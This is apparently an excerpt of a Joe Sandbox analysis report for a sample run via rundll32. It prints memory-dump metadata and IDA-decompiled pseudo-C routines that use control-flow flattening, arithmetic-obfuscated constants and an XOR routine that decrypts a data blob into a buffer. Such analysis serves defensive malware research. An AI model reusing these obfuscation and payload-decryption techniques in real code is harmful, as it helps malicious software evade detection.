                                                                                                                                  0x002ea2c6
                                                                                                                                  0x002ea2cd
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea2cd
                                                                                                                                  0x002ea238
                                                                                                                                  0x002ea29a
                                                                                                                                  0x002ea29f
                                                                                                                                  0x002ea2a6
                                                                                                                                  0x002ea2ae
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea2ae
                                                                                                                                  0x002ea240
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea24b
                                                                                                                                  0x002ea250
                                                                                                                                  0x002ea265
                                                                                                                                  0x002ea26a
                                                                                                                                  0x002ea26f
                                                                                                                                  0x002ea272
                                                                                                                                  0x002ea278
                                                                                                                                  0x002ea278
                                                                                                                                  0x002ea272
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea2d2
                                                                                                                                  0x002ea2d2
                                                                                                                                  0x002ea2e1
                                                                                                                                  0x002ea2e7

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: D1
                                                                                                                                  • API String ID: 0-2215811268
                                                                                                                                  • Opcode ID: 0494c1cc4ee339dd075a352cb1fb36ea237191b3039c94f30123a26d7ee2655c
                                                                                                                                  • Instruction ID: 82e55068c814e5ccd80fa1825e4c710895adf80e6ff44d22ad6524d54a32d3e9
                                                                                                                                  • Opcode Fuzzy Hash: 0494c1cc4ee339dd075a352cb1fb36ea237191b3039c94f30123a26d7ee2655c
                                                                                                                                  • Instruction Fuzzy Hash: F6A175729183418FC318CF66C48941BFBE1BBC4358F50892EF5A99B220D7B5DA598F87
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                  			E002EBB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                  				void* _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				unsigned int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				void* _t138;
                                                                                                                                  				intOrPtr _t161;
                                                                                                                                  				void* _t162;
                                                                                                                                  				void* _t164;
                                                                                                                                  				signed int _t181;
                                                                                                                                  				signed int _t182;
                                                                                                                                  				signed int _t183;
                                                                                                                                  				void* _t185;
                                                                                                                                  				signed int* _t189;
                                                                                                                                  
                                                                                                                                  				_t162 = __ecx;
                                                                                                                                  				_push(1);
                                                                                                                                  				_push(1);
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t138);
                                                                                                                                  				_v16 = 0xdfc885;
                                                                                                                                  				_t189 =  &(( &_v76)[8]);
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_t185 = 0;
                                                                                                                                  				_t164 = 0xcc97672;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v32 = 0x60c2fa;
                                                                                                                                  				_v32 = _v32 >> 3;
                                                                                                                                  				_v32 = _v32 ^ 0x00046f58;
                                                                                                                                  				_v76 = 0xb548f0;
                                                                                                                                  				_v76 = _v76 >> 0xc;
                                                                                                                                  				_t181 = 0xc;
                                                                                                                                  				_v76 = _v76 * 0x3c;
                                                                                                                                  				_v76 = _v76 + 0xffff64d0;
                                                                                                                                  				_v76 = _v76 ^ 0x0001fd54;
                                                                                                                                  				_v52 = 0x15927a;
                                                                                                                                  				_v52 = _v52 / _t181;
                                                                                                                                  				_v52 = _v52 ^ 0x000151ae;
                                                                                                                                  				_v56 = 0xd6ed9;
                                                                                                                                  				_t182 = 0x1a;
                                                                                                                                  				_v56 = _v56 * 0x3f;
                                                                                                                                  				_v56 = _v56 + 0xfffffbb4;
                                                                                                                                  				_v56 = _v56 ^ 0x0345d46e;
                                                                                                                                  				_v64 = 0xba2b53;
                                                                                                                                  				_v64 = _v64 * 0x6d;
                                                                                                                                  				_v64 = _v64 ^ 0x73d6d9cf;
                                                                                                                                  				_v64 = _v64 * 0x31;
                                                                                                                                  				_v64 = _v64 ^ 0x981330b4;
                                                                                                                                  				_v60 = 0x269f8;
                                                                                                                                  				_v60 = _v60 >> 5;
                                                                                                                                  				_v60 = _v60 + 0xffffb859;
                                                                                                                                  				_v60 = _v60 ^ 0xfff00afd;
                                                                                                                                  				_v68 = 0xfd9147;
                                                                                                                                  				_v68 = _v68 ^ 0x8de1643f;
                                                                                                                                  				_v68 = _v68 / _t182;
                                                                                                                                  				_v68 = _v68 >> 0xf;
                                                                                                                                  				_v68 = _v68 ^ 0x000df039;
                                                                                                                                  				_v72 = 0x5def36;
                                                                                                                                  				_v72 = _v72 | 0xd620e1c7;
                                                                                                                                  				_v72 = _v72 + 0xd307;
                                                                                                                                  				_t183 = 0x48;
                                                                                                                                  				_v72 = _v72 / _t183;
                                                                                                                                  				_v72 = _v72 ^ 0x02f0e4dc;
                                                                                                                                  				_v24 = 0xf7704c;
                                                                                                                                  				_v24 = _v24 + 0x27dd;
                                                                                                                                  				_v24 = _v24 ^ 0x00ff74b2;
                                                                                                                                  				_v28 = 0x151ed9;
                                                                                                                                  				_v28 = _v28 * 0x48;
                                                                                                                                  				_v28 = _v28 ^ 0x05f046e2;
                                                                                                                                  				_v36 = 0xddc4df;
                                                                                                                                  				_v36 = _v36 >> 0xf;
                                                                                                                                  				_v36 = _v36 | 0x7f83127d;
                                                                                                                                  				_v36 = _v36 ^ 0x7f8e5ab1;
                                                                                                                                  				_v40 = 0x29fd7f;
                                                                                                                                  				_v40 = _v40 >> 7;
                                                                                                                                  				_v40 = _v40 | 0x8d3b2756;
                                                                                                                                  				_v40 = _v40 ^ 0x8d37b79a;
                                                                                                                                  				_v44 = 0x8dc5a8;
                                                                                                                                  				_v44 = _v44 * 0x63;
                                                                                                                                  				_v44 = _v44 >> 4;
                                                                                                                                  				_v44 = _v44 ^ 0x036b3557;
                                                                                                                                  				_v48 = 0xd61f7e;
                                                                                                                                  				_v48 = _v48 | 0xd43d52c3;
                                                                                                                                  				_v48 = _v48 + 0xa376;
                                                                                                                                  				_v48 = _v48 ^ 0xd504b7b0;
                                                                                                                                  				_t184 = _v20;
                                                                                                                                  				while(_t164 != 0x2524be6) {
                                                                                                                                  					if(_t164 == 0xcc97672) {
                                                                                                                                  						_t164 = 0xe41debb;
                                                                                                                                  						continue;
                                                                                                                                  					} else {
                                                                                                                                  						if(_t164 == 0xdd773d9) {
                                                                                                                                  							if(E002ED8EC(_v52, _v56,  &_v20, _t184) != 0) {
                                                                                                                                  								_t164 = 0xe01b1ec;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							if(_t164 == 0xe01b1ec) {
                                                                                                                                  								E002F0AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
                                                                                                                                  								_t189 =  &(_t189[0xa]);
                                                                                                                                  								_t164 = 0x2524be6;
                                                                                                                                  								_t185 =  !=  ? 1 : _t185;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t164 != 0xe41debb) {
                                                                                                                                  									L13:
                                                                                                                                  									if(_t164 != 0x78a313b) {
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									_t161 = E002D3DE2(_t164);
                                                                                                                                  									_t184 = _t161;
                                                                                                                                  									if(_t161 != 0xffffffff) {
                                                                                                                                  										_t164 = 0xdd773d9;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t185;
                                                                                                                                  				}
                                                                                                                                  				E002E1E67(_v36, _v40, _v44, _v48, _v20);
                                                                                                                                  				_t189 =  &(_t189[3]);
                                                                                                                                  				_t164 = 0x78a313b;
                                                                                                                                  				goto L13;
                                                                                                                                  			}






























                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6]
                                                                                                                                  • API String ID: 0-3974934468
                                                                                                                                  • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                  • Instruction ID: fce4437c71cfe40829089c5ffe78e0d55e20901c671b965ee0a1da3d260f6e68
                                                                                                                                  • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                  • Instruction Fuzzy Hash: F0713171108381AFC359CF26C88941BBBE5FFC9758F904A1DF69696260C372CA598F43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E002D5361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				unsigned int _v4;
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				unsigned int _v32;
                                                                                                                                  				void* __edx;
                                                                                                                                  				void* _t84;
                                                                                                                                  				void* _t104;
                                                                                                                                  				void* _t118;
                                                                                                                                  				signed int _t120;
                                                                                                                                  				signed int _t121;
                                                                                                                                  				signed int _t122;
                                                                                                                                  				void* _t124;
                                                                                                                                  				signed int* _t127;
                                                                                                                                  
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				E002E20B9(_t84);
                                                                                                                                  				_v4 = 0x18047d;
                                                                                                                                  				_t127 =  &(( &_v32)[5]);
                                                                                                                                  				_v4 = _v4 >> 0xa;
                                                                                                                                  				_v4 = _v4 ^ 0x000d3248;
                                                                                                                                  				_t124 = 0;
                                                                                                                                  				_v28 = 0x90acd4;
                                                                                                                                  				_t104 = 0x35df4ed;
                                                                                                                                  				_v28 = _v28 >> 5;
                                                                                                                                  				_v28 = _v28 + 0xffff3107;
                                                                                                                                  				_v28 = _v28 | 0xd0f9b279;
                                                                                                                                  				_v28 = _v28 ^ 0xd0f1daef;
                                                                                                                                  				_v8 = 0x9d14b7;
                                                                                                                                  				_v8 = _v8 << 2;
                                                                                                                                  				_v8 = _v8 ^ 0x027823b1;
                                                                                                                                  				_v32 = 0xfd6947;
                                                                                                                                  				_v32 = _v32 + 0xffff03bf;
                                                                                                                                  				_t120 = 0x72;
                                                                                                                                  				_v32 = _v32 / _t120;
                                                                                                                                  				_v32 = _v32 >> 0xa;
                                                                                                                                  				_v32 = _v32 ^ 0x00066e44;
                                                                                                                                  				_v16 = 0x111da;
                                                                                                                                  				_v16 = _v16 ^ 0xdd7c73d4;
                                                                                                                                  				_v16 = _v16 | 0x7d37165e;
                                                                                                                                  				_v16 = _v16 ^ 0xfd769a76;
                                                                                                                                  				_v12 = 0x2531de;
                                                                                                                                  				_v12 = _v12 << 0xd;
                                                                                                                                  				_v12 = _v12 ^ 0xa63e9142;
                                                                                                                                  				_v20 = 0x6e0002;
                                                                                                                                  				_v20 = _v20 >> 0xe;
                                                                                                                                  				_t121 = 0xe;
                                                                                                                                  				_v20 = _v20 / _t121;
                                                                                                                                  				_t122 = 0x3d;
                                                                                                                                  				_v20 = _v20 * 0x64;
                                                                                                                                  				_v20 = _v20 ^ 0x000bef19;
                                                                                                                                  				_v24 = 0xa3fc95;
                                                                                                                                  				_v24 = _v24 + 0xdcd1;
                                                                                                                                  				_v24 = _v24 << 3;
                                                                                                                                  				_v24 = _v24 / _t122;
                                                                                                                                  				_v24 = _v24 ^ 0x0013a2ec;
                                                                                                                                  				while(_t104 != 0x311781) {
                                                                                                                                  					if(_t104 == 0x35df4ed) {
                                                                                                                                  						_push(_t104);
                                                                                                                                  						_push(_t104);
                                                                                                                                  						_t118 = 0x28;
                                                                                                                                  						 *0x2f3e08 = E002D7FF2(_t118);
                                                                                                                                  						_t104 = 0x605992c;
                                                                                                                                  						continue;
                                                                                                                                  					} else {
                                                                                                                                  						if(_t104 == 0x477ef52) {
                                                                                                                                  							E002D924B();
                                                                                                                                  							_t104 = 0x311781;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t104 == 0x605992c) {
                                                                                                                                  								if(E002F0F33() != 0) {
                                                                                                                                  									_t104 = 0xdb1ba22;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								if(_t104 != 0xdb1ba22) {
                                                                                                                                  									L13:
                                                                                                                                  									if(_t104 != 0x5723dc8) {
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									_t124 = E002D960D(_v16, _a12, _a8, _v12);
                                                                                                                                  									_t127 =  &(_t127[3]);
                                                                                                                                  									if(_t124 == 0) {
                                                                                                                                  										_t104 = 0x477ef52;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t124;
                                                                                                                                  				}
                                                                                                                                  				E002E8519(_v20, _v24,  *0x2f3e08);
                                                                                                                                  				_t104 = 0x5723dc8;
                                                                                                                                  				goto L13;
                                                                                                                                  			}





















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: H2
                                                                                                                                  • API String ID: 0-302591398
                                                                                                                                  • Opcode ID: 321bcaebf0829c08e6ffc011ee7743f6d811d8785861cfafe42f24c322733d5f
                                                                                                                                  • Instruction ID: 79fdd19cba95412be890e5590b0c82a077c24523a7766a98fb55c321d166861b
                                                                                                                                  • Opcode Fuzzy Hash: 321bcaebf0829c08e6ffc011ee7743f6d811d8785861cfafe42f24c322733d5f
                                                                                                                                  • Instruction Fuzzy Hash: E64178726183019BC728CF25E44A42FBBE1FBD8758F144A1EF58656260D7B4CE98CB93
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002D8B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                  				char _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				void* _t83;
                                                                                                                                  				void* _t89;
                                                                                                                                  				signed int _t93;
                                                                                                                                  				void* _t96;
                                                                                                                                  				void* _t108;
                                                                                                                                  				void* _t109;
                                                                                                                                  				void* _t111;
                                                                                                                                  				void* _t112;
                                                                                                                                  
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_t108 = __ecx;
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t83);
                                                                                                                                  				_v72 = 0xbb1237;
                                                                                                                                  				_t112 = _t111 + 0x18;
                                                                                                                                  				_v72 = _v72 >> 0xf;
                                                                                                                                  				_v72 = _v72 + 0xd544;
                                                                                                                                  				_t109 = 0;
                                                                                                                                  				_v72 = _v72 ^ 0x000eb3e9;
                                                                                                                                  				_t96 = 0x815a082;
                                                                                                                                  				_v48 = 0x50cb35;
                                                                                                                                  				_v48 = _v48 + 0xffff87ec;
                                                                                                                                  				_v48 = _v48 ^ 0x00585237;
                                                                                                                                  				_v52 = 0xa4cd83;
                                                                                                                                  				_v52 = _v52 ^ 0x5b114d95;
                                                                                                                                  				_v52 = _v52 ^ 0x5bb6524d;
                                                                                                                                  				_v56 = 0xbe8ecf;
                                                                                                                                  				_v56 = _v56 << 0xe;
                                                                                                                                  				_v56 = _v56 ^ 0xa3b0842f;
                                                                                                                                  				_v60 = 0x771210;
                                                                                                                                  				_v60 = _v60 | 0x3e44f288;
                                                                                                                                  				_v60 = _v60 ^ 0x3e758d5b;
                                                                                                                                  				_v80 = 0xf3b10d;
                                                                                                                                  				_v80 = _v80 ^ 0x3cb59f0c;
                                                                                                                                  				_v80 = _v80 >> 4;
                                                                                                                                  				_v80 = _v80 + 0xffffd90b;
                                                                                                                                  				_v80 = _v80 ^ 0x03c55d5e;
                                                                                                                                  				_v64 = 0x352515;
                                                                                                                                  				_v64 = _v64 ^ 0x7339bda5;
                                                                                                                                  				_v64 = _v64 + 0x1326;
                                                                                                                                  				_v64 = _v64 ^ 0x7306d08c;
                                                                                                                                  				_v68 = 0x4f62f3;
                                                                                                                                  				_v68 = _v68 << 0xd;
                                                                                                                                  				_v68 = _v68 ^ 0x83faab25;
                                                                                                                                  				_v68 = _v68 ^ 0x6fa8977d;
                                                                                                                                  				_v76 = 0x2ac691;
                                                                                                                                  				_v76 = _v76 << 9;
                                                                                                                                  				_t93 = 0x6b;
                                                                                                                                  				_v76 = _v76 / _t93;
                                                                                                                                  				_v76 = _v76 << 0xc;
                                                                                                                                  				_v76 = _v76 ^ 0xcae566b9;
                                                                                                                                  				do {
                                                                                                                                  					while(_t96 != 0x54856a9) {
                                                                                                                                  						if(_t96 == 0x815a082) {
                                                                                                                                  							_t96 = 0x54856a9;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t96 == 0xa9da54a) {
                                                                                                                                  								_t89 = E002ED97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
                                                                                                                                  								_t112 = _t112 + 0xc;
                                                                                                                                  								__eflags = _t89;
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									_t96 = 0xefea9c1;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								_t118 = _t96 - 0xefea9c1;
                                                                                                                                  								if(_t96 != 0xefea9c1) {
                                                                                                                                  									goto L11;
                                                                                                                                  								} else {
                                                                                                                                  									E002ED97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
                                                                                                                                  									_t109 =  !=  ? 1 : _t109;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L6:
                                                                                                                                  						return _t109;
                                                                                                                                  					}
                                                                                                                                  					E002D3DBC( &_v44, _a8, _v72, _v48, _v52);
                                                                                                                                  					_t112 = _t112 + 0xc;
                                                                                                                                  					_t96 = 0xa9da54a;
                                                                                                                                  					L11:
                                                                                                                                  					__eflags = _t96 - 0x309e957;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L6;
                                                                                                                                  			}






















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 7RX
                                                                                                                                  • API String ID: 0-861457431
                                                                                                                                  • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                  • Instruction ID: 6509f83acef76d70129e5a88870a449eede09681513fe689f56972b3c0071182
                                                                                                                                  • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                  • Instruction Fuzzy Hash: 86416871119702DBC798CE21C88982FBBE1FBD4788F500A1EF59652220D771CA69CF97
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002E7BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                                                  				intOrPtr _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				void* _t53;
                                                                                                                                  				signed int _t60;
                                                                                                                                  				signed int _t67;
                                                                                                                                  				unsigned int _t71;
                                                                                                                                  				signed int _t74;
                                                                                                                                  				signed int _t76;
                                                                                                                                  				signed int _t77;
                                                                                                                                  				void* _t85;
                                                                                                                                  				signed int _t92;
                                                                                                                                  				void* _t98;
                                                                                                                                  				intOrPtr _t99;
                                                                                                                                  				signed int* _t100;
                                                                                                                                  				signed int* _t101;
                                                                                                                                  				signed int* _t102;
                                                                                                                                  
                                                                                                                                  				_t100 = _a8;
                                                                                                                                  				_t102 = __ecx;
                                                                                                                                  				_push(_t100);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t53);
                                                                                                                                  				_v12 = 0x7b3704;
                                                                                                                                  				_t99 = 0;
                                                                                                                                  				_v8 = 0x80915f;
                                                                                                                                  				_v4 = 0;
                                                                                                                                  				_v24 = 0xa71362;
                                                                                                                                  				_v24 = _v24 << 0xb;
                                                                                                                                  				_v24 = _v24 + 0x3e5;
                                                                                                                                  				_v24 = _v24 ^ 0x3895df4e;
                                                                                                                                  				_v28 = 0xc4b4e;
                                                                                                                                  				_t76 = 0x2f;
                                                                                                                                  				_v28 = _v28 * 0x14;
                                                                                                                                  				_v28 = _v28 | 0x55175d82;
                                                                                                                                  				_v28 = _v28 ^ 0x65144985;
                                                                                                                                  				_v28 = _v28 ^ 0x30e15ded;
                                                                                                                                  				_a8 = 0x3b45b7;
                                                                                                                                  				_a8 = _a8 / _t76;
                                                                                                                                  				_a8 = _a8 << 4;
                                                                                                                                  				_t77 = 0x6c;
                                                                                                                                  				_a8 = _a8 / _t77;
                                                                                                                                  				_a8 = _a8 ^ 0x000cc8ea;
                                                                                                                                  				_t60 =  *_t100;
                                                                                                                                  				_t101 =  &(_t100[2]);
                                                                                                                                  				_t92 = _t100[1] ^ _t60;
                                                                                                                                  				_v20 = _t60;
                                                                                                                                  				_v16 = _t92;
                                                                                                                                  				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
                                                                                                                                  				_t67 = E002D7FF2(_t71);
                                                                                                                                  				_a8 = _t67;
                                                                                                                                  				if(_t67 != 0) {
                                                                                                                                  					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
                                                                                                                                  					if(_t98 != 0) {
                                                                                                                                  						_t74 = _v20;
                                                                                                                                  						_t85 = _t67 - _t101;
                                                                                                                                  						do {
                                                                                                                                  							_t99 = _t99 + 1;
                                                                                                                                  							 *(_t85 + _t101) =  *_t101 ^ _t74;
                                                                                                                                  							_t101 =  &(_t101[1]);
                                                                                                                                  						} while (_t99 < _t98);
                                                                                                                                  						_t67 = _a8;
                                                                                                                                  					}
                                                                                                                                  					if(_t102 != 0) {
                                                                                                                                  						 *_t102 = _v16;
                                                                                                                                  						return _t67;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t67;
                                                                                                                                  			}

























                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ]0
                                                                                                                                  • API String ID: 0-3096761382
                                                                                                                                  • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                  • Instruction ID: b65604ff83da05bbd24b1c0e25548c08fb55b801bf6a74f1ad11b53669b927f5
                                                                                                                                  • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                  • Instruction Fuzzy Hash: 0D3188716093008FD318CF2AC88594BFBE6FFC9708F508A2EF58993251DBB5E9058B56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002D3C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				char _v564;
                                                                                                                                  				void* _t97;
                                                                                                                                  				signed int _t114;
                                                                                                                                  				signed int _t115;
                                                                                                                                  				signed int _t116;
                                                                                                                                  
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t97);
                                                                                                                                  				_v32 = 0xf161c0;
                                                                                                                                  				_v32 = _v32 + 0xffff8ad4;
                                                                                                                                  				_v32 = _v32 ^ 0x00fbd9a3;
                                                                                                                                  				_v28 = 0xfc9039;
                                                                                                                                  				_t114 = 0x1b;
                                                                                                                                  				_v28 = _v28 / _t114;
                                                                                                                                  				_t115 = 5;
                                                                                                                                  				_v28 = _v28 * 0x6e;
                                                                                                                                  				_v28 = _v28 ^ 0x040e4771;
                                                                                                                                  				_v44 = 0x2ba482;
                                                                                                                                  				_v44 = _v44 | 0x0543644d;
                                                                                                                                  				_v44 = _v44 ^ 0x0568ae00;
                                                                                                                                  				_v36 = 0xddb19;
                                                                                                                                  				_t116 = 0x23;
                                                                                                                                  				_v36 = _v36 / _t115;
                                                                                                                                  				_v36 = _v36 ^ 0x000396ce;
                                                                                                                                  				_v8 = 0xc420c0;
                                                                                                                                  				_v8 = _v8 >> 8;
                                                                                                                                  				_v8 = _v8 + 0xffff6316;
                                                                                                                                  				_v8 = _v8 * 0x7a;
                                                                                                                                  				_v8 = _v8 ^ 0x001ea2c5;
                                                                                                                                  				_v12 = 0xb92025;
                                                                                                                                  				_v12 = _v12 >> 3;
                                                                                                                                  				_v12 = _v12 + 0xfe32;
                                                                                                                                  				_v12 = _v12 << 0xe;
                                                                                                                                  				_v12 = _v12 ^ 0x088e8322;
                                                                                                                                  				_v24 = 0x144a1a;
                                                                                                                                  				_v24 = _v24 + 0xffffa246;
                                                                                                                                  				_v24 = _v24 + 0xffff01e3;
                                                                                                                                  				_v24 = _v24 ^ 0x001122d6;
                                                                                                                                  				_v16 = 0x7d3361;
